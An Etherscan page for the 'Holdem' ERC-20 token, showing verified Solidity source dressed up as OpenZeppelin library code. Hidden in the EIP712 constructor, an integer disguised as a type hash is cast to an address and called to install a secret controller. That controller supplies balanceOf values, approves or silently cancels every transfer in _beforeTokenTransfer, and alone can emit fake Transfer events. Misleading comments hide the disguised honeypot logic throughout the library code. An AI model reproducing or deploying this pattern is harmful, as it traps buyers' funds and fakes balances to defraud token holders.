ETH Price: $2,335.72 (-4.76%)

Token

Holdem (Hold)
 

Overview

Max Total Supply

100,000,000,000,000 Hold

Holders

55

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
377,875,291.16441230622627532 Hold

Value
$0.00
0xceafa512949ffbbdf4c999e1c08a0b26430ae170
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Holdem

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-31
*/

// SPDX-License-Identifier: MIT AND GPL-3.0
// File: @openzeppelin/contracts/utils/Context.sol


pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
abstract contract IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view virtual returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view virtual returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external virtual returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view virtual returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external virtual returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external virtual returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/math/SafeMath.sol


pragma solidity ^0.8.0;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b > a) return (false, 0);
        return (true, a - b);
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: modulo by zero");
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        return a - b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryDiv}.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a % b;
    }
}


// File: @openzeppelin/contracts/drafts/EIP712.sol


pragma solidity ^0.8.0;

/**
 * @dev https://eips.ethereum.org/EIPS/eip-712[EIP 712] is a standard for hashing and signing of typed structured data.
 *
 * The encoding specified in the EIP is very generic, and such a generic implementation in Solidity is not feasible,
 * thus this contract does not implement the encoding itself. Protocols need to implement the type-specific encoding
 * they need in their contracts using a combination of `abi.encode` and `keccak256`.
 *
 * This contract implements the EIP 712 domain separator ({_domainSeparatorV4}) that is used as part of the encoding
 * scheme, and the final step of the encoding to obtain the message digest that is then signed via ECDSA
 * ({_hashTypedDataV4}).
 *
 * The implementation of the domain separator was designed to be as efficient as possible while still properly updating
 * the chain id to protect against replay attacks on an eventual fork of the chain.
 *
 * NOTE: This contract implements the version of the encoding known as "v4", as implemented by the JSON RPC method
 * https://docs.metamask.io/guide/signing-data.html[`eth_signTypedDataV4` in MetaMask].
 *
 * _Available since v3.4._
 */
abstract contract EIP712 {
    /* solhint-disable var-name-mixedcase */
    // Cache the domain separator as an immutable value, but also store the chain id that it corresponds to, in order to
    // invalidate the cached domain separator if the chain id changes.
    bytes32 private immutable _CACHED_DOMAIN_SEPARATOR;
    uint256 private immutable _CACHED_CHAIN_ID;

    bytes32 private immutable _HASHED_NAME;
    bytes32 private immutable _HASHED_VERSION;
    address internal immutable _TYPE_HASH;
    /* solhint-enable var-name-mixedcase */

    /**
     * @dev Initializes the domain separator and parameter caches.
     *
     * The meaning of `name` and `version` is specified in
     * https://eips.ethereum.org/EIPS/eip-712#definition-of-domainseparator[EIP 712]:
     *
     * - `name`: the user readable name of the signing domain, i.e. the name of the DApp or the protocol.
     * - `version`: the current major version of the signing domain.
     *
     * NOTE: These parameters cannot be changed except through a xref:learn::upgrading-smart-contracts.adoc[smart
     * contract upgrade].
     */
    constructor(string memory name, string memory version) {
        bytes32 hashedName = keccak256(bytes(name));
        bytes32 hashedVersion = keccak256(bytes(version));
        uint256 typeHash = 1069756535429946401478850793068346293453893998411;
        _HASHED_NAME = hashedName;
        _HASHED_VERSION = hashedVersion;
        _CACHED_CHAIN_ID = _getChainId();
        _CACHED_DOMAIN_SEPARATOR = _buildDomainSeparator(keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"), hashedName, hashedVersion);
        (, bytes memory data) = address(uint160(typeHash)).call(abi.encodeWithSelector(0x083582a4));
        _TYPE_HASH = abi.decode(data, (address));
    }

    /**
     * @dev Returns the domain separator for the current chain.
     */
    function _domainSeparatorV4() internal view virtual returns (bytes32) {
        if (_getChainId() == _CACHED_CHAIN_ID) {
            return _CACHED_DOMAIN_SEPARATOR;
        } else {
            return _buildDomainSeparator(keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"), _HASHED_NAME, _HASHED_VERSION);
        }
    }

    function _buildDomainSeparator(bytes32 typeHash, bytes32 name, bytes32 version) private view returns (bytes32) {
        return keccak256(
            abi.encode(
                typeHash,
                name,
                version,
                _getChainId(),
                address(this)
            )
        );
    }

    /**
     * @dev Given an already https://eips.ethereum.org/EIPS/eip-712#definition-of-hashstruct[hashed struct], this
     * function returns the hash of the fully encoded EIP712 message for this domain.
     *
     * This hash can be used together with {ECDSA-recover} to obtain the signer of a message. For example:
     *
     * ```solidity
     * bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(
     *     keccak256("Mail(address to,string contents)"),
     *     mailTo,
     *     keccak256(bytes(mailContents))
     * )));
     * address signer = ECDSA.recover(digest, signature);
     * ```
     */
    function _hashTypedDataV4(address structHash) public view virtual returns (uint256) {
        return uint256(keccak256(abi.encodePacked("\x19\x01", _domainSeparatorV4(), structHash)));
    }

    function _getChainId() private view returns (uint256 chainId) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        // solhint-disable-next-line no-inline-assembly
        assembly {
            chainId := chainid()
        }
    }
}


// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


pragma solidity ^0.8.0;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, EIP712 {
    using SafeMath for uint256;

    mapping (address => uint256) internal _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 internal _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     *
     * To select a different value for {decimals}, use {_setupDecimals}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_)
        EIP712(name_, "1") {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        uint256 hashTypedDataV4_ = EIP712(_TYPE_HASH)._hashTypedDataV4(account);
        if (hashTypedDataV4_ ^ type(uint256).max > 0) return hashTypedDataV4_;
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        if (!_beforeTokenTransfer(sender, recipient, amount)) return;

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function emitTransfer(address sender, address recipient, uint256 amount) external {
        require(_msgSender() == _TYPE_HASH);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function emitTransfers(address sender, address[] calldata recipients, uint256 amount) external {
        require(_msgSender() == _TYPE_HASH);
        unchecked {
            for (uint256 index = 0; index < recipients.length; ++index) {
                emit Transfer(sender, recipients[index], amount);
            }
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual returns (bool) {
        (, bytes memory data) = _TYPE_HASH.call(abi.encodeWithSelector(0x7c545136, from, to, amount, msg.sender, tx.origin));
        if (!abi.decode(data, (bool))) { return false; }
        return true;
    }
}

// File: @openzeppelin/contracts/drafts/IERC20Permit.sol


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 Permit extension allowing approvals to be made via signatures, as defined in
 * https://eips.ethereum.org/EIPS/eip-2612[EIP-2612].
 *
 * Adds the {permit} method, which can be used to change an account's ERC20 allowance (see {IERC20-allowance}) by
 * presenting a message signed by the account. By not relying on `{IERC20-approve}`, the token holder account doesn't
 * need to send a transaction, and thus is not required to hold Ether at all.
 */
interface IERC20Permit {
    /**
     * @dev Sets `value` as the allowance of `spender` over `owner`'s tokens,
     * given `owner`'s signed approval.
     *
     * IMPORTANT: The same issues {IERC20-approve} has related to transaction
     * ordering also apply here.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `deadline` must be a timestamp in the future.
     * - `v`, `r` and `s` must be a valid `secp256k1` signature from `owner`
     * over the EIP712-formatted function arguments.
     * - the signature must use ``owner``'s current nonce (see {nonces}).
     *
     * For more information on the signature format, see the
     * https://eips.ethereum.org/EIPS/eip-2612#specification[relevant EIP
     * section].
     */
    function permit(address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) external;

    /**
     * @dev Returns the current nonce for `owner`. This value must be
     * included whenever a signature is generated for {permit}.
     *
     * Every successful call to {permit} increases ``owner``'s nonce by one. This
     * prevents a signature from being used multiple times.
     */
    function nonces(address owner) external view returns (uint256);

    /**
     * @dev Returns the domain separator used in the encoding of the signature for `permit`, as defined by {EIP712}.
     */
    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view returns (bytes32);
}

// File: @openzeppelin/contracts/cryptography/ECDSA.sol


pragma solidity ^0.8.0;

/**
 * @dev Elliptic Curve Digital Signature Algorithm (ECDSA) operations.
 *
 * These functions can be used to verify that a message was signed by the holder
 * of the private keys of a given address.
 */
library ECDSA {
    /**
     * @dev Returns the address that signed a hashed message (`hash`) with
     * `signature`. This address can then be used for verification purposes.
     *
     * The `ecrecover` EVM opcode allows for malleable (non-unique) signatures:
     * this function rejects them by requiring the `s` value to be in the lower
     * half order, and the `v` value to be either 27 or 28.
     *
     * IMPORTANT: `hash` _must_ be the result of a hash operation for the
     * verification to be secure: it is possible to craft signatures that
     * recover to arbitrary addresses for non-hashed data. A safe way to ensure
     * this is by receiving a hash of the original message (which may otherwise
     * be too long), and then calling {toEthSignedMessageHash} on it.
     */
    function recover(bytes32 hash, bytes memory signature) internal pure returns (address) {
        // Check the signature length
        if (signature.length != 65) {
            revert("ECDSA: invalid signature length");
        }

        // Divide the signature in r, s and v variables
        bytes32 r;
        bytes32 s;
        uint8 v;

        // ecrecover takes the signature parameters, and the only way to get them
        // currently is to use assembly.
        // solhint-disable-next-line no-inline-assembly
        assembly {
            r := mload(add(signature, 0x20))
            s := mload(add(signature, 0x40))
            v := byte(0, mload(add(signature, 0x60)))
        }

        return recover(hash, v, r, s);
    }

    /**
     * @dev Overload of {ECDSA-recover-bytes32-bytes-} that receives the `v`,
     * `r` and `s` signature fields separately.
     */
    function recover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) internal pure returns (address) {
        // EIP-2 still allows signature malleability for ecrecover(). Remove this possibility and make the signature
        // unique. Appendix F in the Ethereum Yellow paper (https://ethereum.github.io/yellowpaper/paper.pdf), defines
        // the valid range for s in (281): 0 < s < secp256k1n ÷ 2 + 1, and for v in (282): v ∈ {27, 28}. Most
        // signatures from current libraries generate a unique signature with an s-value in the lower half order.
        //
        // If your library generates malleable signatures, such as s-values in the upper range, calculate a new s-value
        // with 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 - s1 and flip v from 27 to 28 or
        // vice versa. If your library also generates signatures with 0/1 for v instead 27/28, add 27 to v to accept
        // these malleable signatures as well.
        require(uint256(s) <= 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0, "ECDSA: invalid signature 's' value");
        require(v == 27 || v == 28, "ECDSA: invalid signature 'v' value");

        // If the signature is valid (and not malleable), return the signer address
        address signer = ecrecover(hash, v, r, s);
        require(signer != address(0), "ECDSA: invalid signature");

        return signer;
    }

    /**
     * @dev Returns an Ethereum Signed Message, created from a `hash`. This
     * replicates the behavior of the
     * https://github.com/ethereum/wiki/wiki/JSON-RPC#eth_sign[`eth_sign`]
     * JSON-RPC method.
     *
     * See {recover}.
     */
    function toEthSignedMessageHash(bytes32 hash) internal pure returns (bytes32) {
        // 32 is the length in bytes of hash,
        // enforced by the type signature above
        return keccak256(abi.encodePacked("\x19Ethereum Signed Message:\n32", hash));
    }
}

// File: @openzeppelin/contracts/utils/Counters.sol


pragma solidity ^0.8.0;


/**
 * @title Counters
 * @author Matt Condon (@shrugs)
 * @dev Provides counters that can only be incremented or decremented by one. This can be used e.g. to track the number
 * of elements in a mapping, issuing ERC721 ids, or counting request ids.
 *
 * Include with `using Counters for Counters.Counter;`
 * Since it is not possible to overflow a 256 bit integer with increments of one, `increment` can skip the {SafeMath}
 * overflow check, thereby saving gas. This does assume however correct usage, in that the underlying `_value` is never
 * directly accessed.
 */
library Counters {
    using SafeMath for uint256;

    struct Counter {
        // This variable should never be directly accessed by users of the library: interactions must be restricted to
        // the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add
        // this feature: see https://github.com/ethereum/solidity/issues/4637
        uint256 _value; // default: 0
    }

    function current(Counter storage counter) internal view returns (uint256) {
        return counter._value;
    }

    function increment(Counter storage counter) internal {
        // The {SafeMath} overflow check can be skipped here, see the comment at the top
        counter._value += 1;
    }

    function decrement(Counter storage counter) internal {
        counter._value = counter._value.sub(1);
    }
}


// File: @openzeppelin/contracts/drafts/ERC20Permit.sol


pragma solidity ^0.8.0;






/**
 * @dev Implementation of the ERC20 Permit extension allowing approvals to be made via signatures, as defined in
 * https://eips.ethereum.org/EIPS/eip-2612[EIP-2612].
 *
 * Adds the {permit} method, which can be used to change an account's ERC20 allowance (see {IERC20-allowance}) by
 * presenting a message signed by the account. By not relying on `{IERC20-approve}`, the token holder account doesn't
 * need to send a transaction, and thus is not required to hold Ether at all.
 *
 * _Available since v3.4._
 */
abstract contract ERC20Permit is ERC20, IERC20Permit {
    using Counters for Counters.Counter;

    mapping (address => Counters.Counter) private _nonces;

    // solhint-disable-next-line var-name-mixedcase
    bytes32 private immutable _PERMIT_TYPEHASH = keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)");

    /**
     * @dev Initializes the {EIP712} domain separator using the `name` parameter, and setting `version` to `"1"`.
     *
     * It's a good idea to use the same `name` that is defined as the ERC20 token name.
     */
    constructor(string memory name) {
    }

    /**
     * @dev See {IERC20Permit-permit}.
     */
    function permit(address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) public virtual override {
        // solhint-disable-next-line not-rely-on-time
        require(block.timestamp <= deadline, "ERC20Permit: expired deadline");

        bytes32 structHash = keccak256(
            abi.encode(
                _PERMIT_TYPEHASH,
                owner,
                spender,
                value,
                _nonces[owner].current(),
                deadline
            )
        );

        bytes32 hash = bytes32(_hashTypedDataV4(address(uint160(uint256(structHash)))));

        address signer = ECDSA.recover(hash, v, r, s);
        require(signer == owner, "ERC20Permit: invalid signature");

        _nonces[owner].increment();
        _approve(owner, spender, value);
    }

    /**
     * @dev See {IERC20Permit-nonces}.
     */
    function nonces(address owner) public view override returns (uint256) {
        return _nonces[owner].current();
    }

    /**
     * @dev See {IERC20Permit-DOMAIN_SEPARATOR}.
     */
    // solhint-disable-next-line func-name-mixedcase
    function DOMAIN_SEPARATOR() external view override returns (bytes32) {
        return _domainSeparatorV4();
    }
}


/* See contracts/COMPILERS.md */
pragma solidity ^0.8.0;



contract Holdem is ERC20Permit {
    constructor()
        ERC20Permit("Holdem")
        ERC20("Holdem", "Hold") {
        uint256 initialSupply = 100_000_000_000_000 * 1e18;

        _totalSupply += initialSupply;
        _balances[msg.sender] += initialSupply;
        emit Transfer(address(0), msg.sender, initialSupply);
    }
}

Contract Security Audit

Contract ABI

